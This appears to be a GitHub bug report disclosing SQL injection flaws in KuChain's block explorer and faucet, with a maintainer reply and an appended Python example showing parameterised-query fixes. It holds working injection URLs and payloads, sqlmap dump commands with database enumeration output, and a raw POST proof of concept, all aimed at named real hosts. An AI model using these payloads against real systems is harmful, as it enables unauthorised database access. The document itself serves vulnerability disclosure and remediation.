Block Explorer Application - SQL Injection #11

Open
Teicu opened this issue Jul 14, 2020 · 1 comment
Labels
improvement Optimization and improvement to code

Comments


Teicu commented Jul 14, 2020

Block Explorer Web Application - SQL Injection Vulnerability

User-submitted values were dynamically included in SQL statements without thorough sanitisation of special characters. SQL queries created in this way are often vulnerable to SQL Injection attacks. An attacker can leverage this issue to directly affect the SQL query syntax, potentially leading to the disclosure of database information, or even a compromise of the hosting server itself.

Vulnerable URL - https://explorer.kuchain.network

Vulnerable page and parameter

  • /testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=SQLINJECTION
  • /testNet/db/v1/plugin/tx_list?_t=1594723901489&block_height=&limit=10&msg_coin_creator=&msg_coin_symbol=&msg_receiver=&msg_sender=SQLINJECTION

Steps to reproduce the behavior:

Open one of the following URLs in a web browser and notice the database error

https://explorer.kuchain.network/testNet/db/v1/plugin/tx_list?_t=1594723901489&block_height=&limit=10&msg_coin_creator=&msg_coin_symbol=&msg_receiver=&msg_sender=%27%7c%7ccast((select%20chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%20as%20numeric)%7c%7c%27&msg_type=&page=1&transfer_condition=and&tx_status=all

https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=%27%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C

Now run the following sqlmap command to extract the full database

./sqlmap.py -u "https://explorer.kuchain.network/testNet/db/v1/plugin/coin_list?_t=1594723888078&limit=10&page=1&symbol=1" --dbms=PostgreSQL --banner --random-agent -p symbol --dump

[14:10:03] [INFO] the back-end DBMS is PostgreSQL
[14:10:03] [INFO] fetching banner
[14:10:04] [INFO] retrieved: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3...
web application technology: Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
banner: 'PostgreSQL 12.3 (Debian 12.3-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit'

[14:10:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[14:10:09] [INFO] fetching current database
[14:10:10] [INFO] retrieved: 'public'
[14:10:10] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[14:10:10] [INFO] fetching tables for database: 'public'
[14:10:12] [INFO] retrieved: 'events'
[14:10:12] [INFO] retrieved: 'messages'
[14:10:13] [INFO] retrieved: 'transfer'
[14:10:14] [INFO] retrieved: 'block'
[14:10:15] [INFO] retrieved: 'err_table'
[14:10:16] [INFO] retrieved: 'account'
[14:10:17] [INFO] retrieved: 'acccoins'
[14:10:17] [INFO] retrieved: 'blockinfo'
[14:10:18] [INFO] retrieved: 'coins'
[14:10:19] [INFO] retrieved: 'delegation'
[14:10:20] [INFO] retrieved: 'delegation_change'
[14:10:21] [INFO] retrieved: 'lockacccoins'
[14:10:22] [INFO] retrieved: 'txmsgs'
[14:10:22] [INFO] retrieved: 'validator'
[14:10:23] [INFO] retrieved: 'tx'
[14:10:24] [INFO] retrieved: 'sync_stat'
[14:10:24] [INFO] fetching columns for table 'txmsgs' in database 'public'
[14:10:26] [INFO] retrieved: '_from'
[14:10:27] [INFO] retrieved: 'text'
[14:10:27] [INFO] retrieved: 'to'
[14:10:28] [INFO] retrieved: 'text'
[14:10:29] [INFO] retrieved: 'action'
[14:10:30] [INFO] retrieved: 'text'
[14:10:31] [INFO] retrieved: 'amount'

etc


Contact Information

m.avram.g@gmail.com

Note that this flaw should be fixed ASAP. Also, I think you had better restrict public access to the API Swagger https://explorer.kuchain.network/testNet/

Kind Regards

EDIT 1:

Seems that the main site has the same issue.

KuChain Betanet Faucet - Blind SQL Injection Vulnerability

Vulnerable URL: https://kuchain.network/faucet
Vulnerable Parameter: receiver
Method: POST

POC:

POST /portal-web/api/applyForTestFunds?lang=en_US HTTP/1.1
Host: kuchain.network
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://kuchain.network/faucet
Content-Type: multipart/form-data; boundary=---------------------------91872151416297495583940013683
Origin: https://kuchain.network
Content-Length: 217
Connection: close

-----------------------------91872151416297495583940013683
Content-Disposition: form-data; name="receiver"

SQLINJECTION
-----------------------------91872151416297495583940013683--

Using the sqlmap command-line tool again to extract sensitive information.

./sqlmap.py -u 'https://kuchain.network:443/portal-web/api/applyForTestFunds?lang=en_US' --data='receiver=test' --dbs --banner --random-agent --risk=3 --level=3 -p receiver

user : kuchain@172.31.186.12
database: jsapi
version: MySQL 8.0.18
database file location: /home/mysql/data/db

Regards
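The root cause described in this report (a request parameter such as `symbol` or `receiver` spliced into the SQL text, so a stray quote changes the statement's syntax) and the fix (bind the value as a parameter and validate its shape) can be shown side by side. The following is an added example, not code from the KuChain explorer or faucet; the `coins` table schema, the column names and the symbol format are assumptions, and SQLite stands in for the PostgreSQL/MySQL back ends named in the report.

```python
import re
import sqlite3

# Constructed sample schema standing in for the explorer's "coins" table.
# Only the table name appears in the report; the columns are assumed.
SCHEMA = """
CREATE TABLE coins (symbol TEXT PRIMARY KEY, creator TEXT, supply INTEGER);
INSERT INTO coins VALUES ('kcs', 'kuchain', 1000000);
INSERT INTO coins VALUES ('btc', 'satoshi', 21000000);
"""

# Assumed allow-list for a coin symbol: short, alphanumeric/underscore only.
SYMBOL_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def open_db():
    """Fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def coin_list_vulnerable(conn, symbol, limit=10, page=1):
    """The reported pattern: the symbol is pasted into the SQL string, so any
    quote character in it is parsed as SQL rather than treated as data."""
    offset = (page - 1) * limit
    sql = (
        "SELECT symbol, creator, supply FROM coins WHERE symbol = '%s' "
        "ORDER BY symbol LIMIT %d OFFSET %d" % (symbol, limit, offset)
    )
    return conn.execute(sql).fetchall()


def coin_list_safe(conn, symbol, limit=10, page=1):
    """Hardened version: validate the symbol's shape, clamp pagination values,
    and bind every user-controlled value as a query parameter."""
    if not SYMBOL_RE.fullmatch(symbol):
        raise ValueError("symbol must match %s" % SYMBOL_RE.pattern)
    limit = max(1, min(int(limit), 100))
    offset = (max(1, int(page)) - 1) * limit
    sql = (
        "SELECT symbol, creator, supply FROM coins WHERE symbol = ? "
        "ORDER BY symbol LIMIT ? OFFSET ?"
    )
    return conn.execute(sql, (symbol, limit, offset)).fetchall()


def probe(symbol):
    """Run both implementations on one input and report ('ok', rows) or
    ('error', exception name) for each, so their behaviour can be compared."""
    results = {}
    for name, fn in (("vulnerable", coin_list_vulnerable), ("safe", coin_list_safe)):
        conn = open_db()
        try:
            results[name] = ("ok", fn(conn, symbol))
        except (sqlite3.Error, ValueError) as exc:
            results[name] = ("error", type(exc).__name__)
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    # A legitimate symbol, the literal marker used in the report, a lone quote
    # (which produces the "database error" the report tells you to look for),
    # and the textbook tautology that widens the WHERE clause.
    for candidate in ("kcs", "SQLINJECTION", "'", "' OR '1'='1"):
        print(repr(candidate), probe(candidate))
```

The single-quote case is the signal the report relies on: the string-built query fails to parse and the server leaks a database error, while the parameterised query simply finds no matching row. The tautology case shows why that matters: the vulnerable builder returns every row, the safe builder rejects the value before it ever reaches the database. The same two changes (bound parameters plus an allow-list on the value's shape) apply to the faucet's `receiver` field.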

Contributor

Pisces-Anjou commented Jul 15, 2020

Hi,

Thanks for your submission. We have tested the issue you mentioned and did notice it.

Kindly note that all the data of KuChain is public data. An attacker can get all the public data by SQL Injection attacks, but it will not cause any practical impact on the chain. We admit this is a small oversight. Thanks for your reminder.

As I have said above, there won't be any practical impact delivered by the issue you mentioned; it will not affect the normal operation of the chain, and it is not in the scope from P1 to P4. After evaluation, we consider it is not a valid vulnerability, but it is a good improvement suggestion.

Thanks for your attention and contribution! Please keep trying and help us improve our chain.

Regards
KuChain Team

@Pisces-Anjou Pisces-Anjou added the improvement Optimization and improvement to code label Jul 15, 2020